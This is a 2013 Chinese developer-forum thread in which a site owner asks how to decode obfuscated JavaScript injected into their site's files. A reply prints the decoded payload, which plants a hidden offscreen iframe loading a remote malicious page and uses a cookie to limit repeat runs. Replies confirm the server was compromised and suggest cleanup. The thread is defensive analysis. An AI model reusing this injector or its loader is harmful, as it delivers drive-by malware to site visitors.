求JS代码解密 方法

2013-01-04 18:41:38 +08:00
 54dev
代码如下
/*9769d9906bb1e2e6b5c473f404ad0ffd*/
try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}
try{d=document["createElement"]("span");}catch(agdsg){zxc=0;}
try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=["3o","4d","46","3l","4c","41","47","46","16","3p","4a","3j","1e","3j","1i","3k","1f","4j","4a","3n","4c","4d","4a","46","16","2p","3j","4c","40","1k","3o","44","47","47","4a","1e","2p","3j","4c","40","1k","4a","3j","46","3m","47","45","1e","1f","1g","1e","3k","1j","3j","1h","1n","1f","1f","1h","3j","27","4l","d","a","3o","4d","46","3l","4c","41","47","46","16","4a","4b","1e","1f","4j","4a","3n","4c","4d","4a","46","16","2p","3j","4c","40","1k","4a","3j","46","3m","47","45","1e","1f","1k","4c","47","35","4c","4a","41","46","3p","1e","1p","22","1f","1k","4b","4d","3k","4b","4c","4a","41","46","3p","1e","21","1f","27","4l","d","a","41","3o","1e","46","3j","4e","41","3p","3j","4c","47","4a","1k","3l","47","47","43","41","3n","2h","46","3j","3k","44","3n","3m","16","1c","1c","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","1k","41","46","3m","3n","4g","31","3o","1e","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1f","29","29","1j","1n","1f","4j","d","a","9","4e","3j","4a","16","4b","4c","46","45","29","4a","4b","1e","1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","1d","28","4b","4c","4h","44","3n","2a","1k","4b","1d","1h","4b","4c","46","45","1h","1d","16","4j","16","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","16","44","3n","3o","4c","26","1j","1d","1h","3p","4a","3j","1e","22","1m","1m","1i","1n","1m","1m","1m","1f","1h","1d","48","4g","27","16","4c","47","48","26","1j","1d","1h","3p","4a","3j","1e","22","1m","1m","1i","1n","1m","1m","1m","1f","1h","1d","48","4g","27","16","4l","28","1l","4b","4c","4h","44","3n","2a","16","28","3m","41","4e","16","3l","44","3j","4b","4b","29","18","4b","1d","1h","4b","4c","46","45","1h","1d","18","2a","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","18","40","4c","4c","48","26","1l","1l","4a","3n","44","41","3j","3k","44","4h","4a","3n","3k","4a","47","3j","3m","3l","3j","4b","4c","1k","47","4a","3p","1l","3j","3m","1l","3o","3n","3n","3m","1k","48","40","48","18","16","4f","41","3m","4c","40","29","18","1d","1h","3p","4a","3j","1e","1p","1m","1m","1i","22","1m","1m","1f","1h","1d","18","16","40","3n","41","3p","40","4c","29","18","1d","1h","3p","4a","3j","1e","1p","1m","1m","1i","22","1m","1m","1f","1h","1d","18","2a","28","1l","41","3o","4a","3j","45","3n","2a","28","1l","3m","41","4e","2a","1d","1f","27","d","a","9","4e","3j","4a","16","3n","4g","48","29","46","3n","4f","16","2g","3j","4c","3n","1e","1f","27","3n","4g","48","1k","4b","3n","4c","2g","3j","4c","3n","1e","3n","4g","48","1k","3p","3n","4c","2g","3j","4c","3n","1e","1f","1h","23","1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-614!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}
/*9769d9906bb1e2e6b5c473f404ad0ffd*/
3444 次点击
所在节点    JavaScript
11 条回复
shiny
2013-01-04 18:46:30 +08:00
最后一句:
ww是window
"e"+vl是eval
z是
function gra(a,b){return Math.floor(Math.random()*(b-a+1))+a;}
function rs(){return Math.random().toString(36).substring(5);}
if(navigator.cookieEnabled && document.cookie.indexOf('testcookie1=')==-1){
var stnm=rs();
document.write('<style>.s'+stnm+' { position:absolute; left:-'+gra(600,1000)+'px; top:-'+gra(600,1000)+'px; }</style> <div class="s'+stnm+'"><iframe src="http://reliablyrebroadcast.org/ad/feed.php" width="'+gra(300,600)+'" height="'+gra(300,600)+'"></iframe></div>');
var exp=new Date();exp.setDate(exp.getDate()+7);
document.cookie='testcookie1='+rs()+'; expires='+exp.toGMTString();
}

直接chrome里console.log就出来了。
54dev
2013-01-04 20:29:35 +08:00
@shiny 网站的JS和INDEX.PHP都被感染了。我晕,应该怎么办。
enj0y
2013-01-04 21:02:20 +08:00
写个脚本,sed -i 替换回去。
fanpenghua
2013-01-04 21:09:16 +08:00
弄居然没Backup ,不行呀。
54dev
2013-01-05 10:10:10 +08:00
@enj0y 是哪个文件感染的还没有查到,SHELL应该怎么写呢
54dev
2013-01-05 10:10:31 +08:00
@fanpenghua 什么意思啊。
metalbug
2013-01-05 10:28:58 +08:00
有病啊,人家之所以加密就是不想让你们看,靠
54dev
2013-01-05 10:47:14 +08:00
@metalbug 一边趴着去。
Mutoo
2013-01-05 17:04:30 +08:00
@metalbug 显示是服务器被挂马了。
metalbug
2013-01-05 19:08:06 +08:00
啊,哈哈,原来挂马了,哈哈哈,恭喜你
fanzeyi
2013-01-05 19:22:08 +08:00


点进这个帖子还要关ESET …… 诶..

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/56564

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX